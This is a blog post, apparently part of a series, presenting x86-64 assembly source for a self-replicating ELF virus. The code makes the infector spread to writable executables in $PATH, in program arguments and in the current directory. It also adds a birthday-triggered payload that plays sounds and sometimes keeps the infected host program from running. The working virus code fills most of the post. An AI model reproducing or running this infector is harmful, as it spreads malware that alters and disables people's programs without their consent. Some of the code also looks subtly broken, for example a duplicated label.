Introduction

In the third post of the ELF file infection series, I would like to tackle a few issues that were left unresolved by the second post. To name a few:

  • The program’s spreading mechanism is still not satisfactory. The program will spread to the $PATH, which is an effective strategy to ensure persistence in the system, however, most executables in $PATH are probably not going to be writable by the user, so this will require root privileges. This is not entirely a problem though, since some of the executables in $PATH are owned by the user (e.g. on my system, this is the case for cargo, rustc and a few other programs), and can exploited this to spread the ELF infector. One way to solve this problem is to try infecting the programs passed as arguments to the infected executable and in the current working directory to ensure that the infector can, at some point, find another host.
  • There is no actual payload that would indicate presence of the infector in the system.
  • The payload is not compressed. This is not a problem in itself, however, it would be nice to have a compressed payload to reduce the size of the infected executable. This will also make it harder to detect the infection, since the infected executable will be smaller than the original one.

The spreading mechanism.

I will start fixing the problems in order. To address the first problem, the entry point of the stub needs to be altered to call more than one infectious.

; The entry point.
_start:
    ; Load the executable to a memfd.
    call load_elf
    ; Load the argp for the first payload.
    mov rdi, [rsp]
    lea rdi, [rsp + 8 + rdi * 8 + 8]
    call infect_path
    ; Load the argv for the second payload.
    lea rbx, [rsp + 8]
    call infect_argv
    ; Infect the current directory as the third payload.
    call infect_selfdir
    ; Call the final birthday payload.
    call birthday
    ; Load the path to the executable
    mov rdi, memfd_path
    ; Prepare to call execve
    ; Load argc + argv
    lea rsi, [rsp + 8]
    ; Load argp
    mov rdx, [rsp]
    lea rdx, [rsp + 8 + rdx * 8 + 8]
    ; Perform the syscall
    push sys_execve
    pop rax
    syscall
    ; Exit in case execve returns due to error.
    mov rdi, -1
    push sys_exit
    pop rax
    syscall

The implementation of infect_argv is pretty straightfoward:

infect_argv:
    ; Load two constants related to access() to
    ; avoid having to reload them in the loop.
    ; We're interested in the syscall number
    ; and the two arguments specifying access
    ; mode.
    push sys_access
    pop r14
    push 6 ; R_OK | W_OK
    pop r15
.argv_loop:
    ; We could use argc, but we can also assume
    ; that argv is terminated with a NULL.
    mov rdi, qword [rbx]
    test rdi, rdi
    je .done
    ; Check if we can infect the file. Don't bother
    ; trying to tweak the permissions.
    mov rsi, r15
    mov rax, r14
    syscall
    ; access() returned nonzero -> we can't infect
    test eax, eax
    jne .skip_infect
    ; Load the path to the executable and infect it.
    mov rdi, qword [rbx]
    call infect
.skip_infect:
    ; Skip to the next pointer in the argv array.
    add rbx, 8
    jmp .argv_loop
.done:
    ret

Infecting the current directory can be done in a hilariously cheeky way of passing PATH=. to infect_path.

infect_selfdir:
    ; Reserve some space on the stack.
    sub rsp, 40
    ; Load the first buffer with PATH=.
    lea rax, [rsp + 9]
    mov dword [rax], 'PATH'
    mov word [rax + 4], '=.'
    mov byte [rax + 6], 0
    ; Write the buffer as the first entry and NULL-terminate the
    ; artificial ARGP.
    lea rdi, [rsp + 16]
    mov qword [rdi], rax
    and qword [rdi + 8], 0
    ; Infect.
    call infect_path
    add rsp, 40
    ret

We will also start following symlinks in the directory infection procedure:

.discard_loop:
    ; Done processing?
    cmp r14, r15
    jbe .getdents_loop
    ; Extract the type of the directory entry.
    movzx ecx, word [rbx + 16]
    mov dl, byte [rbx + rcx - 1]
    ; Skip if not a regular file or a symlink.
    and dl, -3
    cmp dl, 8
    jne .give_up

The payload.

For the purposes of this blog post, I will assume that the target operating system is using OSS sound (and not e.g. ALSA), as ALSA has proven itself to be way less reliable and convoluted in my test to be of any particular interest. Thankfully, on modern Linux distributions we can enable OSS compatibility using sudo modprobe snd-pcm-oss.

I would like the payload to activate on my birthday (9/7/2004, every year). This is not as simple as it sounds (surprised yet?) because most time-related system calls in Linux are dispatched via the vDSO which puts me in an inescapable low level programming heck. A simpler to explain idea would just be querying the UNIX time stamp system call and computing the day of month and the month from it myself. It’s not as difficult as it seems, albeit it involves some peculiarities.

sys_time equ 201

birthday:
    ; Ask for the current UNIX time.
    mov eax, sys_time
    xor edi, edi
    syscall
    ; Determine whether we are dealing with a
    ; leap year. We want to obtain the divmod of
    ; the UNIX time stamp and four years expressed in
    ; seconds (1461 * seconds in a day) = (1461 * 24 * 60 * 60)
    ; = 126230400
    mov ecx, eax
    mov esi, 126230400
    xor edx, edx
    div esi
    imul rax, rax, -126230400
    add rax, rcx
    ; Determine the correct year in the four year interval.
    ; If the quotient result of divmod is less than a year,
    ; just ignore the entire thing.
    ; 31536000 is the amount of seconds in a year.
    cmp rax, 31536000
    jl .year_ok
    ; Check if we're in the 2nd year of the 4 year interval.
    ; Easy to notice that this constant is the amount of seconds
    ; in two years.
    cmp rax, 63072000
    jb .sub_year
    ; Same logic as above except three years.
    ; There's a twist though: we need to account for a leap day.
    ; The logic for leap days is way different...
    cmp rax, 94694400
    jb .is_leap
    ; Leap year: subtract 3 years worth of seconds and add a leap day.
    sub rax, 94694400
    jmp .year_ok
.sub_year:
    ; Subtract a year's worth of seconds.
    sub rax, 31536000
.year_ok:
    ; Calculate days since 01/01.
    mov ecx, 86400
    xor edx, edx
    div rcx
    cdqe
    ; Load the running total of days in each month.
    mov rcx, days
.determine_month:
    push -1
    pop rdx
.month_loop:
    ; Bump up the month until exceeded days since 01/01.
    lea esi, [rdx + 2]
    movsxd rsi, dword [rcx + 4 * rsi]
    inc edx
    cmp rax, rsi
    jg .month_loop
    ; Save the month value for later.
    mov esi, edx
    ; Load the day of month.
    movsxd rcx, dword [rcx + 4 * rsi]
    sub rax, rcx
    ; Check if the day and month match.
    cmp rax, 9
    jne .heck
    cmp edx, 7
    jne .heck
    ; Pick a random number and proceed only with 10% certainty...
    imul rax, qword [rip + seed], LCG_A
    add rax, LCG_B
    mov qword [rip + seed], rax
    push 10
    pop rcx
    xor edx, edx
    div rcx
    test rdx, rdx
    je proceed
.heck:
    ret
.is_leap:
    ; Compute day of year and load the leap days LUT.
    sub eax, 63072000
    mov ecx, 86400
    xor edx, edx
    div ecx
    mov rcx, ldays
    jmp .determine_month

ldays:
    dd -1, 30, 59, 90, 120, 151, 181, 212, 243, 273, 304, 334, 365

days:
    dd -1, 30, 58, 89, 119, 150, 180, 211, 242, 272, 303, 333, 364

The routine will call the proceed function once ready. My silly idea is surprisingly simple:

  • Open /dev/dsp1.
  • Play a second or two of a suspenseful sound.
  • Pause the execution for a second
  • Play either a “cheery” or a “doomy” sound.
  • If the cheery sound is played, nothing happens and the /dev/dsp1 descriptor is closed.
  • If the doomy sound is played, the executable attached to the program does not launch and we exit with return code 0.
proceed:
    ; Open the sound device.
    mov rax, 2
    mov r8, 1
    mov edi, snddev
    mov rsi, r8
    syscall
    ; Play the "suspense" sound.
    mov edi, eax
    xor ebp, ebp
    ; Load the place on the stack where the sample is saved.
    lea rsi, [rsp - 4]
    xor ebx, ebx
.susp_loop:
    ; 58000 ticks.
    cmp ebx, 58000
    je .susp_done
    ; Generate the sample.
    mov ecx, ebx
    shr ecx, 13
    and cl, 27
    mov eax, 322376503
    shr eax, cl
    and eax, 127
    imul eax, ebx
    mov ecx, ebx
    shr ecx, 4
    or ecx, ebp
    or ecx, eax
    ; Save and write.
    mov dword [rsp - 4], ecx
    mov rdx, r8
    mov rax, r8
    syscall
    ; Loop again.
    inc ebx
    add ebp, 32
    jmp .susp_loop
.susp_done:
    ; Purposefully waste some CPU cycles for delay.
    mov eax, 100000
.busy:
    sub eax, 1
    jb .busydone
    nop
    jmp .busy
.busydone:
    ; Roll a dice. 33% chance of playing the "doomy" sound.
    imul rax, qword [seed], LCG_A
    add rax, LCG_B
    mov qword [seed], rax
    xor ebp, ebp
    mov r9, 3
    xor edx, edx
    div r9
    test rdx, rdx
    je .doomy
    ; Generate the "good" samples!
    mov r10d, 1
    mov ebx, 8
    mov ebp, 13
    lea rsi, [rsp - 12]
    mov r14d, 12
    ; The song is procedurally generated in stages three stages:
    ; stage 0, stage 1 and stage 2.
.good_main:
    cmp r10d, 106000
    je .good_done
    mov eax, ebp
    mov ecx, ebx
    cmp r10d, 35000
    jb .good0
    cmp r10d, 67499
    ja .good1
    lea ecx, [r10 + 8 * r10]
    mov eax, ebp
    jmp .good0
.good1:
    cmp r10d, 83999
    ja .good2
    lea ecx, [r10 + 8 * r10]
    mov eax, r14d
    jmp .good0
.good2:
    lea ecx, [8*r10]
    cmp r10d, 98000
    mov eax, ebp
    sbb eax, 0
.good0:
    mov edx, r10d
    shr edx, 2
    imul eax, r10d
    add eax, edx
    mov edx, r10d
    shr edx, 3
    or edx, ecx
    mov ecx, r10d
    shr ecx, 5
    or ecx, edx
    or ecx, eax
    ; Write the sample.
    mov dword [rsp - 12], ecx
    mov rdx, r8
    mov rax, r8
    syscall
    inc r10d
    add ebx, 8
    jmp .good_main
.good_done:
    ; Close file descriptor.
    mov rax, r9
    syscall
    jmp .cleanup
.doomy:
    ; "Doomy" track.
    lea rsi, [rsp - 8]
.doomy_loop:
    cmp ebp, 250000
    je .cleanup
    mov eax, ebp
    shr eax, 11
    mov ecx, ebp
    shr ecx, 1
    or ecx, eax
    imul eax, ecx, 430
    ; Write the sample.
    mov dword [rsp - 8], eax
    mov rdx, r8
    mov rax, r8
    syscall
    add ebp, 5
    jmp .doomy_loop
.cleanup:
    ; Exit with code 0.
    mov rax, 60
    xor edi, edi
    syscall
.cleanup:
    ret

snddev: db "/dev/dsp1", 0

Conclusion

Having added a small payload, I think that my ELF infector is complete. Even though I technically have not implemented payload compression, the executable file is small enough (~2.3KB) to a degree where implementing it would be very difficult to have it yield any gains.

Finally, the payload can become a program on its own, which you are encouraged to test (harmless!):

format ELF64 executable
use64

entry _start

seed: dq 0

LCG_A equ 1103515245
LCG_B equ 12345

_start:
    ; Query the current time stamp counter as a source of randomness.
    ; rdtsc will set rdx and rax to the higher and lower bits of the time
    ; stamp counter, so we put them together and store them in the RNG seed
    ; variable.
    rdtsc
    shl rdx, 32
    or rdx, rax
    mov qword [seed], rdx
    ; Open the sound device.
    mov rax, 2
    mov r8, 1
    mov edi, snddev
    mov rsi, r8
    syscall
    ; Play the "suspense" sound.
    mov edi, eax
    xor ebp, ebp
    ; Load the place on the stack where the sample is saved.
    lea rsi, [rsp - 4]
    xor ebx, ebx
.susp_loop:
    ; 58000 ticks.
    cmp ebx, 58000
    je .susp_done
    ; Generate the sample.
    mov ecx, ebx
    shr ecx, 13
    and cl, 27
    mov eax, 322376503
    shr eax, cl
    and eax, 127
    imul eax, ebx
    mov ecx, ebx
    shr ecx, 4
    or ecx, ebp
    or ecx, eax
    ; Save and write.
    mov dword [rsp - 4], ecx
    mov rdx, r8
    mov rax, r8
    syscall
    ; Loop again.
    inc ebx
    add ebp, 32
    jmp .susp_loop
.susp_done:
    ; Purposefully waste some CPU cycles for delay.
    mov eax, 100000
.busy:
    sub eax, 1
    jb .busydone
    nop
    jmp .busy
.busydone:
    ; Roll a dice. 33% chance of playing the "doomy" sound.
    imul rax, qword [seed], LCG_A
    add rax, LCG_B
    mov qword [seed], rax
    xor ebp, ebp
    mov r9, 3
    xor edx, edx
    div r9
    test rdx, rdx
    je .doomy
    ; Generate the "good" samples!
    mov r10d, 1
    mov ebx, 8
    mov ebp, 13
    lea rsi, [rsp - 12]
    mov r14d, 12
    ; The song is procedurally generated in stages three stages:
    ; stage 0, stage 1 and stage 2.
.good_main:
    cmp r10d, 106000
    je .good_done
    mov eax, ebp
    mov ecx, ebx
    cmp r10d, 35000
    jb .good0
    cmp r10d, 67499
    ja .good1
    lea ecx, [r10 + 8 * r10]
    mov eax, ebp
    jmp .good0
.good1:
    cmp r10d, 83999
    ja .good2
    lea ecx, [r10 + 8 * r10]
    mov eax, r14d
    jmp .good0
.good2:
    lea ecx, [8*r10]
    cmp r10d, 98000
    mov eax, ebp
    sbb eax, 0
.good0:
    mov edx, r10d
    shr edx, 2
    imul eax, r10d
    add eax, edx
    mov edx, r10d
    shr edx, 3
    or edx, ecx
    mov ecx, r10d
    shr ecx, 5
    or ecx, edx
    or ecx, eax
    ; Write the sample.
    mov dword [rsp - 12], ecx
    mov rdx, r8
    mov rax, r8
    syscall
    inc r10d
    add ebx, 8
    jmp .good_main
.good_done:
    ; Close file descriptor.
    mov rax, r9
    syscall
    jmp .cleanup
.doomy:
    ; "Doomy" track.
    lea rsi, [rsp - 8]
.doomy_loop:
    cmp ebp, 250000
    je .cleanup
    mov eax, ebp
    shr eax, 11
    mov ecx, ebp
    shr ecx, 1
    or ecx, eax
    imul eax, ecx, 430
    ; Write the sample.
    mov dword [rsp - 8], eax
    mov rdx, r8
    mov rax, r8
    syscall
    add ebp, 5
    jmp .doomy_loop
.cleanup:
    ; Exit with code 0.
    mov rax, 60
    xor edi, edi
    syscall

snddev: db "/dev/dsp1", 0

As usual, the source code for this and all the other posts in this series are available on GitHub!